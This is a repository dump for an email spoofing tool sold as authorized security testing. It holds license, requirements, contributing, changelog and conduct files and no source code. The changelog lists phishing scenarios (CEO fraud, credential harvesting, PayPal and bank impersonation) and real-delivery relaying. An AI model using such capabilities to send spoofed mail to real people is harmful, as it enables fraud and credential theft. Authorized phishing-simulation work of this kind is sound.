├── LICENSE
├── requirements.txt
├── .gitignore
├── CONTRIBUTING.md
├── CHANGELOG.md
├── CODE_OF_CONDUCT.md
├── README.md
├── install.sh
└── est.py
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2025 Tech Sky - Security Research Team
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | # EST - Email Spoofing Tool Requirements
2 | # Compatible with Python 3.8+ including Python 3.13+
3 |
4 | # Core DNS functionality for MX record resolution
5 | dnspython>=2.1.0
6 |
7 | # Essential Python packaging tools
8 | setuptools>=45.0
9 | wheel>=0.36.0
10 |
11 | # Optional: Enhanced functionality
12 | # Note: These are optional and will be installed if available
13 | # Most functionality works with just dnspython
14 |
15 | # For enhanced email parsing (optional)
16 | # email-validator>=1.3.0
17 |
18 | # For improved CLI experience (optional)
19 | # rich>=10.0.0
20 |
21 | # For YAML configuration support (optional)
22 | # PyYAML>=5.4.0
23 |
24 | # Installation Notes:
25 | # ==================
26 | #
27 | # For Python 3.13+ (Kali Linux, newer distributions):
28 | # - The installer will automatically create a virtual environment
29 | # - This avoids externally-managed-environment errors
30 | # - System packages (python3-dnspython) are preferred when available
31 | #
32 | # For older Python versions:
33 | # - Direct installation via pip should work normally
34 | # - Virtual environments are still recommended for isolation
35 | #
36 | # System package alternatives:
37 | # - Debian/Ubuntu/Kali: sudo apt install python3-dnspython
38 | # - Fedora: sudo dnf install python3-dns
39 | # - Arch: sudo pacman -S python-dnspython
40 | #
41 | # Manual installation fallback:
42 | # - pip3 install --user dnspython (user-local)
43 | # - pip3 install --user --break-system-packages dnspython (override)
44 | #
45 | # Virtual environment installation:
46 | # - python3 -m venv ~/.est-env
47 | # - source ~/.est-env/bin/activate
48 | # - pip install -r requirements.txt
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # EST - Email Spoofing Tool .gitignore
2 | # This file prevents sensitive and unnecessary files from being committed
3 |
4 | # Python
5 | __pycache__/
6 | *.py[cod]
7 | *$py.class
8 | *.so
9 | .Python
10 | build/
11 | develop-eggs/
12 | dist/
13 | downloads/
14 | eggs/
15 | .eggs/
16 | lib/
17 | lib64/
18 | parts/
19 | sdist/
20 | var/
21 | wheels/
22 | pip-wheel-metadata/
23 | share/python-wheels/
24 | *.egg-info/
25 | .installed.cfg
26 | *.egg
27 | MANIFEST
28 |
29 | # PyInstaller
30 | *.manifest
31 | *.spec
32 |
33 | # Installer logs
34 | pip-log.txt
35 | pip-delete-this-directory.txt
36 |
37 | # Unit test / coverage reports
38 | htmlcov/
39 | .tox/
40 | .nox/
41 | .coverage
42 | .coverage.*
43 | .cache
44 | nosetests.xml
45 | coverage.xml
46 | *.cover
47 | *.py,cover
48 | .hypothesis/
49 | .pytest_cache/
50 |
51 | # Virtual environments
52 | .env
53 | .venv
54 | env/
55 | venv/
56 | ENV/
57 | env.bak/
58 | venv.bak/
59 |
60 | # IDE files
61 | .vscode/
62 | .idea/
63 | *.swp
64 | *.swo
65 | *~
66 |
67 | # macOS
68 | .DS_Store
69 |
70 | # Windows
71 | Thumbs.db
72 | ehthumbs.db
73 | Desktop.ini
74 | $RECYCLE.BIN/
75 |
76 | # Linux
77 | *~
78 |
79 | # EST specific files
80 | # ==================
81 |
82 | # Configuration files with sensitive data
83 | config.json
84 | settings.json
85 | credentials.json
86 | secrets.json
87 |
88 | # Log files
89 | *.log
90 | logs/
91 | est_tests.log
92 | smtp_server.log
93 |
94 | # Test data
95 | test_emails/
96 | test_results/
97 | tmp_emails/
98 |
99 | # Reports with potentially sensitive information
100 | reports/*.json
101 | reports/*.html
102 | reports/*.pdf
103 | *.report
104 |
105 | # User configuration directory contents
106 | .est/config.json
107 | .est/logs/
108 | .est/reports/
109 | .est/temp/
110 |
111 | # Email test files
112 | *.eml
113 | *.msg
114 | test_*.txt
115 |
116 | # SMTP server temporary files
117 | smtp_temp/
118 | mail_queue/
119 |
120 | # SSL/TLS certificates (if any)
121 | *.pem
122 | *.key
123 | *.crt
124 | *.csr
125 | *.p12
126 | *.pfx
127 |
128 | # Database files (if any)
129 | *.db
130 | *.sqlite
131 | *.sqlite3
132 |
133 | # Backup files
134 | *.bak
135 | *.backup
136 | *.old
137 |
138 | # Temporary files
139 | *.tmp
140 | *.temp
141 | temp/
142 | tmp/
143 |
144 | # Archive files
145 | *.zip
146 | *.tar.gz
147 | *.rar
148 |
149 | # Documentation build files
150 | docs/_build/
151 | docs/build/
152 | site/
153 |
154 | # JetBrains IDEs
155 | .idea/
156 | *.iml
157 | *.ipr
158 | *.iws
159 |
160 | # Sublime Text
161 | *.sublime-project
162 | *.sublime-workspace
163 |
164 | # Vim
165 | *.swp
166 | *.swo
167 |
168 | # Emacs
169 | *~
170 | \#*\#
171 | /.emacs.desktop
172 | /.emacs.desktop.lock
173 | *.elc
174 | auto-save-list
175 | tramp
176 | .\#*
177 |
178 | # Security sensitive files
179 | # =========================
180 | # Never commit these types of files for a security tool
181 |
182 | # API keys and tokens
183 | .env.local
184 | .env.production
185 | api_keys.txt
186 | tokens.txt
187 |
188 | # User credentials
189 | usernames.txt
190 | passwords.txt
191 | creds.txt
192 |
193 | # Real email addresses
194 | real_emails.txt
195 | target_emails.txt
196 | email_lists.txt
197 |
198 | # Production configuration
199 | production.json
200 | prod_config.json
201 |
202 | # SSH keys
203 | id_rsa
204 | id_rsa.pub
205 | *.pem
206 |
207 | # Local environment variables
208 | .env.*
209 |
210 | # OS generated files
211 | .DS_Store?
212 | Icon?
213 | .Spotlight-V100
214 | .Trashes
215 | ._*
216 |
217 | # Windows image file caches
218 | Thumbs.db
219 | ehthumbs.db
220 |
221 | # Folder config file
222 | Desktop.ini
223 |
224 | # Recycle Bin used on file shares
225 | $RECYCLE.BIN/
226 |
227 | # Application specific
228 | node_modules/
229 | .npm
230 | .sass-cache/
231 |
232 | # Custom additions for EST
233 | # ========================
234 |
235 | # Installation artifacts
236 | install.log
237 | installation_*.log
238 |
239 | # Test results
240 | test_output/
241 | test_logs/
242 | junit.xml
243 |
244 | # Performance test results
245 | performance_*.json
246 | benchmark_*.txt
247 |
248 | # Documentation builds
249 | _site/
250 | .jekyll-cache/
251 | .jekyll-metadata
252 |
253 | # Local development
254 | local_*
255 | dev_*
256 | debug_*
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing to EST (Email Spoofing Tool)
2 |
3 | Thank you for your interest in contributing to EST! This document provides guidelines and information for contributors.
4 |
5 | ## 🚨 Legal Notice
6 |
7 | **IMPORTANT**: EST is designed for authorized security testing, penetration testing, and educational purposes only. By contributing to this project, you acknowledge that:
8 |
9 | - You will only use EST for legitimate, authorized security testing
10 | - You understand the legal implications of email spoofing tools
11 | - You agree to obtain explicit written permission before testing any systems you do not own
12 | - Unauthorized use may violate local, state, and federal laws
13 |
14 | ## 🎯 Ways to Contribute
15 |
16 | ### 1. Bug Reports
17 | - Use GitHub Issues to report bugs
18 | - Include detailed steps to reproduce
19 | - Provide system information (OS, Python version)
20 | - Include relevant log files or error messages
21 |
22 | ### 2. Feature Requests
23 | - Propose new security testing scenarios
24 | - Suggest improvements to existing functionality
25 | - Request documentation enhancements
26 |
27 | ### 3. Code Contributions
28 | - Fix bugs or implement new features
29 | - Improve code quality and performance
30 | - Add unit tests for new functionality
31 | - Update documentation
32 |
33 | ### 4. Documentation
34 | - Improve README or documentation
35 | - Add examples and tutorials
36 | - Fix typos or clarify instructions
37 | - Translate documentation
38 |
39 | ## 🛠️ Development Setup
40 |
41 | ### Prerequisites
42 | - Python 3.8 or higher
43 | - Git
44 | - pip3
45 |
46 | ### Getting Started
47 |
48 | 1. **Fork the repository**
49 | ```bash
50 | # Click "Fork" on GitHub, then clone your fork
51 | git clone https://github.com/techsky-eh/EST.git
52 | cd EST
53 | ```
54 |
55 | 2. **Set up development environment**
56 | ```bash
57 | # Create virtual environment
58 | python3 -m venv venv
59 | source venv/bin/activate # Linux/macOS
60 | # venv\Scripts\activate # Windows
61 |
62 | # Install dependencies
63 | pip install -r requirements.txt
64 |
65 | # Install in development mode
66 | pip install -e .
67 | ```
68 |
69 | 3. **Test the installation**
70 | ```bash
71 | python3 est.py --help
72 | ```
73 |
74 | ## 📋 Code Guidelines
75 |
76 | ### Python Style
77 | - Follow PEP 8 style guidelines
78 | - Use meaningful variable and function names
79 | - Add docstrings to all functions and classes
80 | - Keep lines under 88 characters when possible
81 |
82 | ### Security Considerations
83 | - Never commit real email addresses or credentials
84 | - Use placeholder domains for examples
85 | - Ensure all test data is clearly marked as test data
86 | - Review code for potential security vulnerabilities
87 |
88 | ### Testing
89 | - Add unit tests for new functionality
90 | - Test on multiple Python versions (3.8+)
91 | - Verify functionality on different operating systems
92 | - Test installation procedures
93 |
94 | ## 🔄 Pull Request Process
95 |
96 | ### Before Submitting
97 | 1. **Check existing issues** - Make sure your contribution isn't already being worked on
98 | 2. **Open an issue** - For significant changes, discuss your approach first
99 | 3. **Create a branch** - Use descriptive branch names like `fix-smtp-timeout` or `add-oauth-support`
100 |
101 | ### Submitting Your PR
102 | 1. **Clear description** - Explain what changes you made and why
103 | 2. **Link issues** - Reference related issues using `Fixes #123`
104 | 3. **Update documentation** - Include relevant documentation updates
105 | 4. **Add tests** - Include tests for new functionality
106 |
107 | ### PR Template
108 | ```
109 | ## Description
110 | Brief description of changes
111 |
112 | ## Type of Change
113 | - [ ] Bug fix (non-breaking change that fixes an issue)
114 | - [ ] New feature (non-breaking change that adds functionality)
115 | - [ ] Breaking change (fix or feature that changes existing functionality)
116 | - [ ] Documentation update
117 |
118 | ## Testing
119 | - [ ] I have tested these changes locally
120 | - [ ] I have added tests that prove my fix is effective
121 | - [ ] I have updated documentation as needed
122 |
123 | ## Security Impact
124 | - [ ] These changes do not introduce security vulnerabilities
125 | - [ ] I have reviewed the code for potential security issues
126 | - [ ] Documentation includes appropriate security warnings
127 |
128 | ## Checklist
129 | - [ ] My code follows the project's style guidelines
130 | - [ ] I have performed a self-review of my code
131 | - [ ] I have commented my code, particularly in hard-to-understand areas
132 | - [ ] My changes generate no new warnings
133 | ```
134 |
135 | ## 🧪 Testing Guidelines
136 |
137 | ### Running Tests
138 | ```bash
139 | # Run all tests
140 | python3 -m pytest
141 |
142 | # Run specific test file
143 | python3 -m pytest tests/test_smtp_server.py
144 |
145 | # Run with coverage
146 | python3 -m pytest --cov=est
147 | ```
148 |
149 | ### Test Categories
150 | - **Unit Tests**: Test individual functions and classes
151 | - **Integration Tests**: Test component interactions
152 | - **Security Tests**: Verify security features work correctly
153 | - **Installation Tests**: Test installation procedures
154 |
155 | ## 📚 Documentation Standards
156 |
157 | ### Code Documentation
158 | - Use Google-style docstrings
159 | - Include parameter types and return values
160 | - Provide usage examples where helpful
161 |
162 | ### README Updates
163 | - Keep installation instructions current
164 | - Update feature lists for new functionality
165 | - Include relevant security warnings
166 |
167 | ## 🐛 Bug Report Template
168 |
169 | When reporting bugs, please include:
170 |
171 | ```
172 | **EST Version**: [e.g., 2.0.0]
173 | **Python Version**: [e.g., 3.9.7]
174 | **Operating System**: [e.g., Ubuntu 20.04]
175 |
176 | **Description**
177 | A clear description of the bug
178 |
179 | **Steps to Reproduce**
180 | 1. Run command: `est server --port 2525`
181 | 2. Execute: `est test 1 test@example.com`
182 | 3. See error...
183 |
184 | **Expected Behavior**
185 | What you expected to happen
186 |
187 | **Actual Behavior**
188 | What actually happened
189 |
190 | **Error Messages**
191 | ```
192 | Include any error messages or logs
193 | ```
194 |
195 | **Additional Context**
196 | Any other context about the problem
197 | ```
198 |
199 | ## 🚀 Feature Request Template
200 |
201 | ```
202 | **Feature Description**
203 | A clear description of the feature you'd like to see
204 |
205 | **Use Case**
206 | Explain how this feature would be used
207 |
208 | **Current Workaround**
209 | How do you currently achieve this (if possible)?
210 |
211 | **Additional Context**
212 | Any other context, mockups, or examples
213 | ```
214 |
215 | ## 📋 Security Scenario Contributions
216 |
217 | ### Adding New Attack Scenarios
218 | When contributing new email spoofing scenarios:
219 |
220 | 1. **Realistic**: Based on actual attack patterns
221 | 2. **Educational**: Include clear descriptions of the attack
222 | 3. **Ethical**: Include appropriate warnings and disclaimers
223 | 4. **Categorized**: Fit into existing categories or propose new ones
224 | 5. **Severity Rated**: Use Critical/High/Medium/Low severity levels
225 |
226 | ### Scenario Template
227 | ```python
228 | {
229 | "name": "Brief Descriptive Name",
230 | "category": "Attack Category",
231 | "from_email": "spoofed@domain.com",
232 | "from_name": "Display Name",
233 | "subject": "Email Subject Line",
234 | "body": "Email body with clear attack simulation...",
235 | "description": "Educational description of the attack type",
236 | "severity": "Critical/High/Medium/Low"
237 | }
238 | ```
239 |
240 | ## 📞 Getting Help
241 |
242 | ### Communication Channels
243 | - **GitHub Issues**: Bug reports and feature requests
244 | - **GitHub Discussions**: Questions and general discussion
245 | - **Security Issues**: Email security@your-domain.com (private disclosure)
246 |
247 | ### Code Review Process
248 | 1. All contributions require review by project maintainers
249 | 2. Reviews focus on functionality, security, and code quality
250 | 3. Address review feedback promptly
251 | 4. Maintainers will merge approved PRs
252 |
253 | ## 🏆 Recognition
254 |
255 | Contributors will be:
256 | - Added to the Contributors section in README.md
257 | - Mentioned in release notes for significant contributions
258 | - Given appropriate credit in documentation
259 |
260 | ## 📋 Contributor License Agreement
261 |
262 | By contributing to EST, you agree that:
263 | - Your contributions will be licensed under the same license as the project (MIT)
264 | - You have the right to submit the contribution
265 | - You understand this is an open source project
266 |
267 | ## ❓ Questions?
268 |
269 | If you have questions about contributing:
270 | 1. Check existing GitHub Issues and Discussions
271 | 2. Read through this CONTRIBUTING.md file
272 | 3. Open a new GitHub Discussion for general questions
273 | 4. Open a GitHub Issue for specific bugs or feature requests
274 |
275 | Thank you for helping make EST a better security testing tool! 🛡️
--------------------------------------------------------------------------------
/CHANGELOG.md:
--------------------------------------------------------------------------------
1 | # Changelog
2 |
3 | All notable changes to EST (Email Spoofing Tool) will be documented in this file.
4 |
5 | The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
6 | and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
7 |
8 | ## [Unreleased]
9 |
10 | ### Added
11 | - Planned: OAuth2 authentication support for modern mail servers
12 | - Planned: Advanced template system for custom scenarios
13 | - Planned: Web-based dashboard for test management
14 | - Planned: Integration with popular penetration testing frameworks
15 |
16 | ### Changed
17 | - Planned: Improved error handling and user feedback
18 | - Planned: Enhanced logging with structured output
19 |
20 | ## [2.0.0] - 2025-06-12
21 |
22 | ### Added
23 | - **Complete rewrite** of EST for professional security testing
24 | - **Multi-threaded SMTP server** with real-time email relay capabilities
25 | - **5 realistic attack scenarios** covering major threat vectors:
26 | - CEO Fraud / Business Email Compromise
27 | - IT Helpdesk credential harvesting
28 | - PayPal phishing simulation
29 | - Microsoft 365 license scams
30 | - Banking institution impersonation
31 | - **Custom spoofing tests** with full parameter control
32 | - **Professional installation script** supporting multiple Linux distributions
33 | - **Comprehensive audit logging** with JSON output format
34 | - **Assessment report generation** with security recommendations
35 | - **Cross-platform compatibility** (Linux, macOS, Windows)
36 | - **Desktop integration** with application launchers
37 | - **Bash completion** for command-line efficiency
38 | - **Automatic MX record resolution** for real email delivery
39 | - **Professional CLI interface** with colored output and progress indicators
40 | - **User configuration management** with ~/.est/ directory structure
41 | - **Documentation suite** including quickstart and troubleshooting guides
42 |
43 | ### Security Features
44 | - **Legal disclaimers** prominently displayed in all outputs
45 | - **Test identification** in all generated emails
46 | - **Secure configuration handling** with proper file permissions
47 | - **Input validation** to prevent injection attacks
48 | - **Ethical use reminders** throughout the application
49 |
50 | ### Technical Improvements
51 | - **Modern Python architecture** using dataclasses and type hints
52 | - **Robust error handling** with graceful degradation
53 | - **Signal handling** for clean server shutdown
54 | - **Connection pooling** for improved performance
55 | - **DNS fallback mechanisms** for reliable email delivery
56 | - **Professional logging** with multiple output levels
57 |
58 | ### Documentation
59 | - **Comprehensive README** with installation and usage instructions
60 | - **Professional installation guide** with system requirements
61 | - **Security guidelines** and legal considerations
62 | - **Contributing guidelines** for open source development
63 | - **Code of conduct** establishing community standards
64 | - **API documentation** for developers
65 |
66 | ### Breaking Changes
67 | - **Complete API redesign** - not compatible with v1.x
68 | - **New command structure** - old commands will not work
69 | - **Configuration format changes** - requires reconfiguration
70 | - **Python 3.8+ requirement** - dropped support for older versions
71 |
72 | ### Migration from v1.x
73 | - Run the new installation script: `./install.sh`
74 | - Review the new configuration format in `~/.est/config.json`
75 | - Update any scripts to use the new command syntax
76 | - See QUICKSTART.md for updated usage examples
77 |
78 | ## [1.3.0] - 2024-03-15
79 |
80 | ### Added
81 | - Basic SMTP relay functionality
82 | - Simple configuration file support
83 | - Command-line argument parsing
84 |
85 | ### Fixed
86 | - Email encoding issues with special characters
87 | - Connection timeout problems
88 |
89 | ### Deprecated
90 | - Legacy configuration format (removed in v2.0.0)
91 |
92 | ## [1.2.1] - 2024-02-20
93 |
94 | ### Fixed
95 | - Critical security vulnerability in email header handling
96 | - Memory leak in SMTP server
97 |
98 | ### Security
99 | - Fixed potential injection vulnerability in email headers
100 | - Added input sanitization for user-provided data
101 |
102 | ## [1.2.0] - 2024-01-10
103 |
104 | ### Added
105 | - Windows support
106 | - Basic logging functionality
107 | - Email template system
108 |
109 | ### Changed
110 | - Improved error messages
111 | - Updated dependencies
112 |
113 | ## [1.1.0] - 2023-11-05
114 |
115 | ### Added
116 | - macOS support
117 | - Basic email scenarios
118 | - Simple installation script
119 |
120 | ### Fixed
121 | - Port binding issues on some systems
122 | - DNS resolution problems
123 |
124 | ## [1.0.0] - 2023-08-20
125 |
126 | ### Added
127 | - Initial release of EST
128 | - Basic email spoofing capabilities
129 | - Simple SMTP server
130 | - Command-line interface
131 | - MIT license
132 |
133 | ### Security Considerations
134 | - Added legal disclaimers
135 | - Implemented basic usage warnings
136 |
137 | ---
138 |
139 | ## Version Support
140 |
141 | - **v2.x**: Current stable release with active development
142 | - **v1.x**: Legacy version, security fixes only until 2025-12-31
143 | - **v0.x**: No longer supported
144 |
145 | ## Upgrade Guidelines
146 |
147 | ### From v1.x to v2.x
148 | 1. **Backup your data**: Export any custom scenarios or configurations
149 | 2. **Uninstall v1.x**: Remove old installation completely
150 | 3. **Install v2.0**: Use the new installation script
151 | 4. **Migrate configuration**: Manually recreate any custom settings
152 | 5. **Update scripts**: Rewrite any automation to use new API
153 |
154 | ### Security Notes
155 | - Always review the security implications when upgrading
156 | - Test thoroughly in a safe environment before production use
157 | - Review the updated legal disclaimers and usage guidelines
158 |
159 | ## Development Milestones
160 |
161 | ### Completed
162 | - ✅ Professional CLI interface
163 | - ✅ Multi-threaded SMTP server
164 | - ✅ Comprehensive logging system
165 | - ✅ Assessment reporting
166 | - ✅ Cross-platform support
167 | - ✅ Professional documentation
168 |
169 | ### In Progress
170 | - 🔄 Web dashboard development
171 | - 🔄 Advanced template engine
172 | - 🔄 Integration testing suite
173 |
174 | ### Planned
175 | - 📋 OAuth2 authentication support
176 | - 📋 Cloud deployment options
177 | - 📋 Advanced analytics dashboard
178 | - 📋 Integration with security frameworks
179 | - 📋 Mobile app for remote testing
180 |
181 | ## Community Contributions
182 |
183 | Special thanks to our contributors:
184 |
185 | ### v2.0.0 Contributors
186 | - **Tech Sky - Ethical Hacking - Security Research Team** - Complete rewrite and professional enhancement
187 | - Community feedback from security professionals worldwide
188 | - Open source contributors and maintainers
189 |
190 | ### Historical Contributors
191 | - **Tech Sky Development Team** - Initial concept and v1.x development
192 | - Beta testers and security researchers - Critical feedback and bug reports
193 | - Cybersecurity community - Scenario development and testing
194 | - Educational institutions - Research and validation support
195 |
196 | ## Support Information
197 |
198 | - **Bug Reports**: Use GitHub Issues
199 | - **Feature Requests**: GitHub Discussions
200 | - **Security Issues**: Email contact@techskyhub.com
201 | - **General Support**: Email contact@techskyhub.com
202 | - **Technical Questions**: Email contact@techskyhub.com
203 | - **Documentation**: See docs/ directory
204 | - **Community**: GitHub Discussions
205 | - **Website**: https://techskyhub.com
206 |
207 | ## Acknowledgments
208 |
209 | ### Special Recognition
210 | - **Tech Sky Team** for dedication to ethical security research
211 | - **Cybersecurity educators** who incorporate EST into training programs
212 | - **Penetration testers** who provide real-world feedback
213 | - **Open source community** for continuous improvement suggestions
214 |
215 | ### Research Partners
216 | - Educational institutions supporting cybersecurity research
217 | - Security conferences and workshops featuring EST demonstrations
218 | - Ethical hacking communities promoting responsible disclosure
219 |
220 | ## Legal & Compliance
221 |
222 | EST is developed and maintained by **Tech Sky - Ethical Hacking - Security Research Team** with a commitment to:
223 |
224 | - **Ethical security testing** practices and guidelines
225 | - **Legal compliance** with applicable cybersecurity regulations
226 | - **Responsible disclosure** of security vulnerabilities
227 | - **Educational advancement** in cybersecurity awareness
228 | - **Professional standards** in penetration testing tools
229 |
230 | ## Contact Information
231 |
232 | **Tech Sky - Ethical Hacking - Security Research Team**
233 |
234 | - **Primary Contact**: contact@techskyhub.com
235 | - **Security Reports**: contact@techskyhub.com
236 | - **Partnership Inquiries**: contact@techskyhub.com
237 | - **Educational Licensing**: contact@techskyhub.com
238 |
239 | For detailed information about any release, see the corresponding GitHub release notes and commit history.
240 |
241 | ---
242 |
243 | *EST v2.0+ - Professional Email Security Assessment Framework*
244 | *Developed with ❤️ by Tech Sky - Ethical Hacking - Security Research Team*
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | We as members, contributors, and leaders pledge to make participation in our
6 | community a harassment-free experience for everyone, regardless of age, body
7 | size, visible or invisible disability, ethnicity, sex characteristics, gender
8 | identity and expression, level of experience, education, socio-economic status,
9 | nationality, personal appearance, race, religion, or sexual identity
10 | and orientation.
11 |
12 | We pledge to act and interact in ways that contribute to an open, welcoming,
13 | diverse, inclusive, and healthy community.
14 |
15 | ## Our Standards
16 |
17 | Examples of behavior that contributes to a positive environment for our
18 | community include:
19 |
20 | * Demonstrating empathy and kindness toward other people
21 | * Being respectful of differing opinions, viewpoints, and experiences
22 | * Giving and gracefully accepting constructive feedback
23 | * Accepting responsibility and apologizing to those affected by our mistakes,
24 | and learning from the experience
25 | * Focusing on what is best not just for us as individuals, but for the
26 | overall community
27 | * Using EST only for authorized security testing and educational purposes
28 | * Respecting the legal and ethical boundaries of security testing
29 | * Providing clear warnings about the proper use of security tools
30 |
31 | Examples of unacceptable behavior include:
32 |
33 | * The use of sexualized language or imagery, and sexual attention or
34 | advances of any kind
35 | * Trolling, insulting or derogatory comments, and personal or political attacks
36 | * Public or private harassment
37 | * Publishing others' private information, such as a physical or email
38 | address, without their explicit permission
39 | * Using EST for unauthorized testing or malicious purposes
40 | * Promoting illegal activities or encouraging misuse of security tools
41 | * Other conduct which could reasonably be considered inappropriate in a
42 | professional setting
43 |
44 | ## Security-Specific Standards
45 |
46 | Given that EST is a security testing tool, we have additional standards:
47 |
48 | ### Ethical Use
49 | * **Authorization Required**: Always obtain explicit written permission before testing systems you do not own
50 | * **Educational Focus**: Use EST for legitimate security research, education, and authorized testing only
51 | * **Responsible Disclosure**: If you discover vulnerabilities using EST, follow responsible disclosure practices
52 | * **Legal Compliance**: Ensure your use of EST complies with local, state, and federal laws
53 |
54 | ### Community Responsibility
55 | * **Clear Warnings**: Always include appropriate disclaimers when sharing EST usage examples
56 | * **No Malicious Code**: Do not contribute malicious payloads or encourage harmful use
57 | * **Privacy Respect**: Do not share real email addresses, credentials, or sensitive information
58 | * **Professional Conduct**: Maintain professional standards when discussing security topics
59 |
60 | ## Enforcement Responsibilities
61 |
62 | Community leaders are responsible for clarifying and enforcing our standards of
63 | acceptable behavior and will take appropriate and fair corrective action in
64 | response to any behavior that they deem inappropriate, threatening, offensive,
65 | or harmful.
66 |
67 | Community leaders have the right and responsibility to remove, edit, or reject
68 | comments, commits, code, wiki edits, issues, and other contributions that are
69 | not aligned to this Code of Conduct, and will communicate reasons for moderation
70 | decisions when appropriate.
71 |
72 | ## Scope
73 |
74 | This Code of Conduct applies within all community spaces, and also applies when
75 | an individual is officially representing the community in public spaces.
76 | Examples of representing our community include using an official e-mail address,
77 | posting via an official social media account, or acting as an appointed
78 | representative at an online or offline event.
79 |
80 | This Code of Conduct specifically applies to:
81 | * GitHub repository interactions (issues, pull requests, discussions)
82 | * Code contributions and reviews
83 | * Documentation and wiki contributions
84 | * Community discussions and forums
85 | * Public presentations or demonstrations of EST
86 | * Any use of EST that reflects on the community
87 |
88 | ## Reporting Guidelines
89 |
90 | ### General Issues
91 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
92 | reported to the community leaders responsible for enforcement at
93 | [contact@techskyhub.com](mailto:contact@techskyhub.com).
94 |
95 | ### Security-Related Issues
96 | If you observe misuse of EST or security-related violations:
97 | * **Immediate Threats**: Contact law enforcement if there's immediate danger
98 | * **Tool Misuse**: Report unauthorized use to [contact@techskyhub.com](mailto:contact@techskyhub.com)
99 | * **Code Vulnerabilities**: Use private disclosure for security vulnerabilities in EST itself
100 |
101 | All complaints will be reviewed and investigated promptly and fairly.
102 |
103 | All community leaders are obligated to respect the privacy and security of the
104 | reporter of any incident.
105 |
106 | ## Enforcement Guidelines
107 |
108 | Community leaders will follow these Community Impact Guidelines in determining
109 | the consequences for any action they deem in violation of this Code of Conduct:
110 |
111 | ### 1. Correction
112 |
113 | **Community Impact**: Use of inappropriate language or other behavior deemed
114 | unprofessional or unwelcome in the community.
115 |
116 | **Consequence**: A private, written warning from community leaders, providing
117 | clarity around the nature of the violation and an explanation of why the
118 | behavior was inappropriate. A public apology may be requested.
119 |
120 | ### 2. Warning
121 |
122 | **Community Impact**: A violation through a single incident or series
123 | of actions.
124 |
125 | **Consequence**: A warning with consequences for continued behavior. No
126 | interaction with the people involved, including unsolicited interaction with
127 | those enforcing the Code of Conduct, for a specified period of time. This
128 | includes avoiding interactions in community spaces as well as external channels
129 | like social media. Violating these terms may lead to a temporary or
130 | permanent ban.
131 |
132 | ### 3. Temporary Ban
133 |
134 | **Community Impact**: A serious violation of community standards, including
135 | sustained inappropriate behavior.
136 |
137 | **Consequence**: A temporary ban from any sort of interaction or public
138 | communication with the community for a specified period of time. No public or
139 | private interaction with the people involved, including unsolicited interaction
140 | with those enforcing the Code of Conduct, is allowed during this period.
141 | Violating these terms may lead to a permanent ban.
142 |
143 | ### 4. Permanent Ban
144 |
145 | **Community Impact**: Demonstrating a pattern of violation of community
146 | standards, including sustained inappropriate behavior, harassment of an
147 | individual, or aggression toward or disparagement of classes of individuals.
148 |
149 | **Consequence**: A permanent ban from any sort of public interaction within
150 | the community.
151 |
152 | ## Security Tool Specific Enforcement
153 |
154 | ### Misuse of EST
155 | If EST is used for unauthorized or malicious purposes:
156 |
157 | 1. **Documentation**: The incident will be documented and reported to appropriate authorities if necessary
158 | 2. **Community Ban**: The user will be permanently banned from the community
159 | 3. **Legal Action**: Legal action may be pursued if laws have been violated
160 | 4. **Public Warning**: A public warning may be issued to protect others
161 |
162 | ### Contributing Malicious Code
163 | Contributors who attempt to introduce malicious functionality:
164 |
165 | 1. **Immediate Removal**: Malicious code will be immediately removed
166 | 2. **Account Suspension**: The contributor's access will be suspended pending investigation
167 | 3. **Permanent Ban**: Confirmed malicious contributions result in permanent community ban
168 | 4. **Security Advisory**: A security advisory may be published if necessary
169 |
170 | ## Attribution
171 |
172 | This Code of Conduct is adapted from the [Contributor Covenant][homepage],
173 | version 2.0, available at
174 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.
175 |
176 | Community Impact Guidelines were inspired by [Mozilla's code of conduct
177 | enforcement ladder](https://github.com/mozilla/diversity).
178 |
179 | [homepage]: https://www.contributor-covenant.org
180 |
181 | For answers to common questions about this code of conduct, see the FAQ at
182 | https://www.contributor-covenant.org/faq. Translations are available at
183 | https://www.contributor-covenant.org/translations.
184 |
185 | ## Legal Disclaimer
186 |
187 | This Code of Conduct does not supersede any applicable laws. EST users and contributors
188 | are responsible for ensuring their activities comply with all applicable laws and
189 | regulations. The EST project maintainers are not responsible for how individuals
190 | use the software.
191 |
192 | ## Contact Information
193 |
194 | For questions about this Code of Conduct:
195 | * **General Questions**: Open a GitHub Discussion
196 | * **Code of Conduct Violations**: [contact@techskyhub.com](mailto:contact@techskyhub.com)
197 | * **Security Issues**: [contact@techskyhub.com](mailto:contact@techskyhub.com)
198 | * **Legal Concerns**: [contact@techskyhub.com](mailto:contact@techskyhub.com)
199 |
200 | Last updated: June 2025
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # EST - Email Spoofing Tool
2 |
3 |
